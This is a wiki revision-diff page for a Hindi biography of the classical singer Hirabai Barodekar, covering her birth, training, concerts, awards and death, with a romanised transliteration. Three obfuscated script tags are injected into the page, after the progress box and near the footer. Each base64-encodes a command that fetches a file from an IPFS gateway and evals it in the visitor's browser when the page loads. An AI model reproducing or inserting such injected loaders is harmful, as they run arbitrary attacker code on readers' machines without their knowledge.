Difference between revisions of "हीराबाई बरोदेकर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''हीराबाई बरोदेकर''' (अंग्रेज़ी: ''Hirabai Barodekar'', जन्म- 29 मई...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
 
'''हीराबाई बरोदेकर''' ([[अंग्रेज़ी]]: ''Hirabai Barodekar'', जन्म- [[29 मई]], [[1905]]; मृत्यु- [[20 नवंबर]], [[1989]]) किराना घराने की हिन्दुस्तानी शस्त्रीय गायिका थीं। उन्हें [[कला]] के क्षेत्र में [[भारत सरकार]] द्वारा सन [[1970]] में '[[पद्म भूषण]]' से सम्मानित किया गया था। हीराबाई बरोदेकर एक प्रतिभाशाली गायिका ही नहीं, बल्कि [[भारत]] की पहली महिला कलाकार थीं जिन्हें पुरुषों के वर्चस्व के दौर में लोग कॉन्सर्ट में सुनने आए। साल [[1947]] में हीराबाई ने अपने जीवन की सबसे ख़ास प्रस्तुति दी थी। [[15 अगस्त]] के दिन जब देश आज़ाद हुआ, उन्हें [[लाल क़िला दिल्ली|लाल क़िले]] पर ख़ासतौर पर आमंत्रित किया गया था, जहाँ उन्होंने राष्ट्रीय गीत ‘[[वंदे मातरम]]’ गाया था।
 
'''हीराबाई बरोदेकर''' ([[अंग्रेज़ी]]: ''Hirabai Barodekar'', जन्म- [[29 मई]], [[1905]]; मृत्यु- [[20 नवंबर]], [[1989]]) किराना घराने की हिन्दुस्तानी शस्त्रीय गायिका थीं। उन्हें [[कला]] के क्षेत्र में [[भारत सरकार]] द्वारा सन [[1970]] में '[[पद्म भूषण]]' से सम्मानित किया गया था। हीराबाई बरोदेकर एक प्रतिभाशाली गायिका ही नहीं, बल्कि [[भारत]] की पहली महिला कलाकार थीं जिन्हें पुरुषों के वर्चस्व के दौर में लोग कॉन्सर्ट में सुनने आए। साल [[1947]] में हीराबाई ने अपने जीवन की सबसे ख़ास प्रस्तुति दी थी। [[15 अगस्त]] के दिन जब देश आज़ाद हुआ, उन्हें [[लाल क़िला दिल्ली|लाल क़िले]] पर ख़ासतौर पर आमंत्रित किया गया था, जहाँ उन्होंने राष्ट्रीय गीत ‘[[वंदे मातरम]]’ गाया था।
 +
==जन्म==
 +
हीराबाई बरोदेकर का जन्म 29 मई, 1905 में [[महाराष्ट्र]] के मिरज में हुआ था। [[पिता]] उस्ताद अब्दुल करीम खां बड़ौदा राजघराने के शाही गायक थे और [[माता]] ताराबाई माने उस राजघराने की सदस्य थीं। परिवारों की रज़ामंदी न होने पर भी दोनों ने [[विवाह]] किया। उनके पांच बच्चे हुए। इनमें से दूसरी बच्ची थीं हीराबाई, जिनका नाम उनके मां और पिता ने चंपाकली रखा था।<ref name="pp">{{cite web |url=https://hindi.feminisminindia.com/2020/02/13/first-indian-female-singer-hirabai-barodekar-perform-in-concert-hindi/ |title=भारत की पहली गायिका जिन्होंने कॉन्सर्ट में गाया था|accessmonthday=21 अप्रॅल|accessyear=2024 |last= |first= |authorlink= |format= |publisher=hindi.feminisminindia.com |language=हिंदी}}</ref>
 +
====शिक्षा====
 +
हीराबाई की [[संगीत]] की शिक्षा बचपन से ही शुरू हो गई थी। तब तक उनके बड़े भाई सुरेशबाबू माने, भी संगीत की दुनिया में अपना कदम रख चुके थे। आगरा घराने के गायक उस्ताद अहमद खां ने हीराबाई को गाना सिखाना शुरू किया। बाद में जब साल [[1922]] में उस्ताद अब्दुल करीम और ताराबाई का तलाक़ हो गया, तब हीराबाई अपने भाई-बहनों के साथ अपनी मां के साथ चली गईं और सुरेशबाबू से संगीत सीखने लगी। बाद में उन्होंने उस दौर के कुछ जानेमाने संगीतकारों से भी शिक्षा ली, जैसे- भास्करबुवा बखळे और उस्ताद अब्दुल वाहिद, जो उनके पिता के भाई भी थे।
 +
==सफलता==
 +
साल [[1921]] में हीराबाई ने बंबई (वर्तमान [[मुम्बई]]) में गांधर्व महाविद्यालय के वार्षिकोत्सव में अपना पहला परफॉरमेंस दिया था। इसके बाद उन्होंने साल [[1937]] में कलकत्ता (वर्तमान [[कोलकाता]]) के 'ऑल इंडिया म्यूजिक कांफ़्रेंस' में भी भाग लिया। उनकी प्रतिभा ने सुनने वालों को चौंका दिया था, क्योंकि किसी ने सोचा नहीं था कि दुबली-पतली, दिखने में साधारण हीराबाई में इतना टैलेंट होगा। हीराबाई का नाम धीरे-धीरे सब जानने लगे थे और आने वाले कुछ सालों में उन्होंने अपना पहला पब्लिक कॉन्सर्ट दिया। तब साधारण समाज में महिलाओं के स्टेज पर परफॉर्म करने को बुरी नज़र में देखा जाता था। उनके चरित्र पर सवाल उठाए जाते थे। ऐसे में हीराबाई [[भारत]] की पहली महिला गायिका बनीं, जिन्होंने आमजनता के लिए स्टेज पर गाया और जिन्हें लोग टिकट खरीदकर सुनने भी गए।
 +
 +
साल [[1924]] में मानिकचंद गाँधी से विवाह के बाद हीराबाई बरोदेकर [[पुणे]] चली आईं। उनकी संगीत की चर्चा रुकी नहीं और कॉन्सर्ट में गाने के साथ-साथ वे अपने घर में बच्चों को गाना सिखाने लगीं। वे [[ख़याल]] और [[ठुमरी]] जैसी शैलियों से लेकर भजन, नाट्य संगीत और [[मराठी]] लोकगीत भी गाती थीं। उन्होंने इस बीच एक जर्मन रिकॉर्डिंग कंपनी और ओडियन के साथ अपने गानों का रिकॉर्ड निकाला। इसमें उनके कुछ मशहूर गाने थे, जैसे- ‘नाच रे नंदलाला’ और ‘उपवनी गात कोकिला।’ इस रिकॉर्ड में उनके भाई-बहन और [[पिता]] के भी कुछ गाने थे। साल [[1947]] में हीराबाई बरोदेकर ने अपनी ज़िन्दग़ी का सबसे ख़ास परफॉरमेंस दिया। [[15 अगस्त]], [[1947]] के दिन जब देश आज़ाद हुआ, उन्हें लाल क़िले पर ख़ासतौर पर आमंत्रित किया गया था, जहां उन्होंने राष्ट्रीय गीत ‘[[वंदे मातरम]]’ गाया। इसके बाद साल [[1953]] में उन्होंने [[चीन]] और कुछ अफ़्रीकन देशों में परफॉर्म किया।<ref name="pp"/>
 +
==पुरस्कार व सम्मान==
 +
*हीराबाई बरोदेकर को कई उपाधियों और पुरस्कारों से सम्मानित किया गया। जगद्गुरु शंकराचार्य ने उन्हें ‘गान सरस्वती’ की उपाधि दी और [[सरोजिनी नायडू]] ने ‘गान कोकिला’ नाम दिया।
 +
*साल [[1955]] में उन्हें [[संगीत नाटक अकादमी पुरस्कार]] मिला।
 +
*साल [[1970]] में [[पद्म भूषण]] से नवाज़ा गया।
 +
 +
बड़े भाई और गुरु सुरेशबाबू माने की मृत्यु साल [[1952]] में हो गई, जिसकी वजह से हीराबाई बरोदेकर को बहुत बड़ा धक्का लगा था। वो धीरे-धीरे अपने अंदर सिमटती रहीं और कम कॉन्सर्टस देने लगीं। [[संगीत]] का अभ्यास उन्होंने फिर भी छोड़ा नहीं और साल [[1968]] में अपनी सबसे छोटी बहन सरस्वती माने के साथ उन्होंने एक रिकॉर्ड निकाला। साल [[1984]] में भी मराठी गानों का एक रिकॉर्ड निकला था, जिसमें उनके और उनके पिता के गाने थे।
 +
==मृत्यु==
 +
[[20 नवंबर]] [[1989]] में हीराबाई बरोदेकर अपने पुणे के घर में चल बसीं। अपने आख़िरी दिन तक वे गाती रहीं और बच्चों को गाना सिखाती रहीं, भले ही उन्होंने खुद बाहर परफॉर्म करना छोड़ दिया हो। उनका घर संगीत के प्रेमियों के लिए एक अलग दुनिया था, जहां हर किसी का स्वागत था, चाहे वो कोई मशहूर कलाकार हो या पहली बार संगीत सीख रहा हो।<ref name="pp"/>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 6: Line 22:
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
{{शास्त्रीय गायक कलाकार}}{{पद्म भूषण}}
+
{{शास्त्रीय गायक कलाकार}}{{पद्म भूषण}}{{संगीत नाटक अकादमी पुरस्कार}}
 
[[Category:शास्त्रीय गायक कलाकार]][[Category:जीवनी साहित्य]][[Category:प्रसिद्ध व्यक्तित्व]]
 
[[Category:शास्त्रीय गायक कलाकार]][[Category:जीवनी साहित्य]][[Category:प्रसिद्ध व्यक्तित्व]]
[[Category:संगीत_कोश]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:कला कोश]][[Category:पद्म भूषण]][[Category:पद्म भूषण (1970)]
+
[[Category:संगीत कोश]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:कला कोश]][[Category:पद्म भूषण]][[Category:पद्म भूषण (1970)]][[Category:संगीत नाटक अकादमी पुरस्कार]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 08:02, 21 April 2024

hirabaee barodekar (aangrezi: Hirabai Barodekar, janm- 29 mee, 1905; mrityu- 20 navanbar, 1989) kirana gharane ki hindustani shastriy gayika thian. unhean kala ke kshetr mean bharat sarakar dvara san 1970 mean 'padm bhooshan' se sammanit kiya gaya tha. hirabaee barodekar ek pratibhashali gayika hi nahian, balki bharat ki pahali mahila kalakar thian jinhean purushoan ke varchasv ke daur mean log k aaunsart mean sunane ae. sal 1947 mean hirabaee ne apane jivan ki sabase khas prastuti di thi. 15 agast ke din jab desh azad hua, unhean lal qile par khasataur par amantrit kiya gaya tha, jahaan unhoanne rashtriy git ‘vande mataram’ gaya tha.

janm

hirabaee barodekar ka janm 29 mee, 1905 mean maharashtr ke miraj mean hua tha. pita ustad abdul karim khaan b dauda rajagharane ke shahi gayak the aur mata tarabaee mane us rajagharane ki sadasy thian. parivaroan ki razamandi n hone par bhi donoan ne vivah kiya. unake paanch bachche hue. inamean se doosari bachchi thian hirabaee, jinaka nam unake maan aur pita ne chanpakali rakha tha.[1]

shiksha

hirabaee ki sangit ki shiksha bachapan se hi shuroo ho gee thi. tab tak unake b de bhaee sureshababoo mane, bhi sangit ki duniya mean apana kadam rakh chuke the. agara gharane ke gayak ustad ahamad khaan ne hirabaee ko gana sikhana shuroo kiya. bad mean jab sal 1922 mean ustad abdul karim aur tarabaee ka talaq ho gaya, tab hirabaee apane bhaee-bahanoan ke sath apani maan ke sath chali geean aur sureshababoo se sangit sikhane lagi. bad mean unhoanne us daur ke kuchh janemane sangitakaroan se bhi shiksha li, jaise- bhaskarabuva bakhळe aur ustad abdul vahid, jo unake pita ke bhaee bhi the.

saphalata

sal 1921 mean hirabaee ne banbee (vartaman mumbee) mean gaandharv mahavidyalay ke varshikotsav mean apana pahala paraph aaurameans diya tha. isake bad unhoanne sal 1937 mean kalakatta (vartaman kolakata) ke 'aaul iandiya myoojik kaanfreans' mean bhi bhag liya. unaki pratibha ne sunane valoan ko chauanka diya tha, kyoanki kisi ne socha nahian tha ki dubali-patali, dikhane mean sadharan hirabaee mean itana taileant hoga. hirabaee ka nam dhire-dhire sab janane lage the aur ane vale kuchh saloan mean unhoanne apana pahala pablik k aaunsart diya. tab sadharan samaj mean mahilaoan ke stej par paraph aaurm karane ko buri nazar mean dekha jata tha. unake charitr par saval uthae jate the. aise mean hirabaee bharat ki pahali mahila gayika banian, jinhoanne amajanata ke lie stej par gaya aur jinhean log tikat kharidakar sunane bhi ge.

sal 1924 mean manikachand gaandhi se vivah ke bad hirabaee barodekar pune chali aeean. unaki sangit ki charcha ruki nahian aur k aaunsart mean gane ke sath-sath ve apane ghar mean bachchoan ko gana sikhane lagian. ve khayal aur thumari jaisi shailiyoan se lekar bhajan, naty sangit aur marathi lokagit bhi gati thian. unhoanne is bich ek jarman rik aaurdiang kanpani aur odiyan ke sath apane ganoan ka rik aaurd nikala. isamean unake kuchh mashahoor gane the, jaise- ‘nach re nandalala’ aur ‘upavani gat kokila.’ is rik aaurd mean unake bhaee-bahan aur pita ke bhi kuchh gane the. sal 1947 mean hirabaee barodekar ne apani zindagi ka sabase khas paraph aaurameans diya. 15 agast, 1947 ke din jab desh azad hua, unhean lal qile par khasataur par amantrit kiya gaya tha, jahaan unhoanne rashtriy git ‘vande mataram’ gaya. isake bad sal 1953 mean unhoanne chin aur kuchh afrikan deshoan mean paraph aaurm kiya.[1]

puraskar v samman

b de bhaee aur guru sureshababoo mane ki mrityu sal 1952 mean ho gee, jisaki vajah se hirabaee barodekar ko bahut b da dhakka laga tha. vo dhire-dhire apane aandar simatati rahian aur kam k aaunsartas dene lagian. sangit ka abhyas unhoanne phir bhi chho da nahian aur sal 1968 mean apani sabase chhoti bahan sarasvati mane ke sath unhoanne ek rik aaurd nikala. sal 1984 mean bhi marathi ganoan ka ek rik aaurd nikala tha, jisamean unake aur unake pita ke gane the.

mrityu

20 navanbar 1989 mean hirabaee barodekar apane pune ke ghar mean chal basian. apane akhiri din tak ve gati rahian aur bachchoan ko gana sikhati rahian, bhale hi unhoanne khud bahar paraph aaurm karana chho d diya ho. unaka ghar sangit ke premiyoan ke lie ek alag duniya tha, jahaan har kisi ka svagat tha, chahe vo koee mashahoor kalakar ho ya pahali bar sangit sikh raha ho.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 bharat ki pahali gayika jinhoanne k aaunsart mean gaya tha (hiandi) hindi.feminisminindia.com. abhigaman tithi: 21 aprॅl, 2024.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>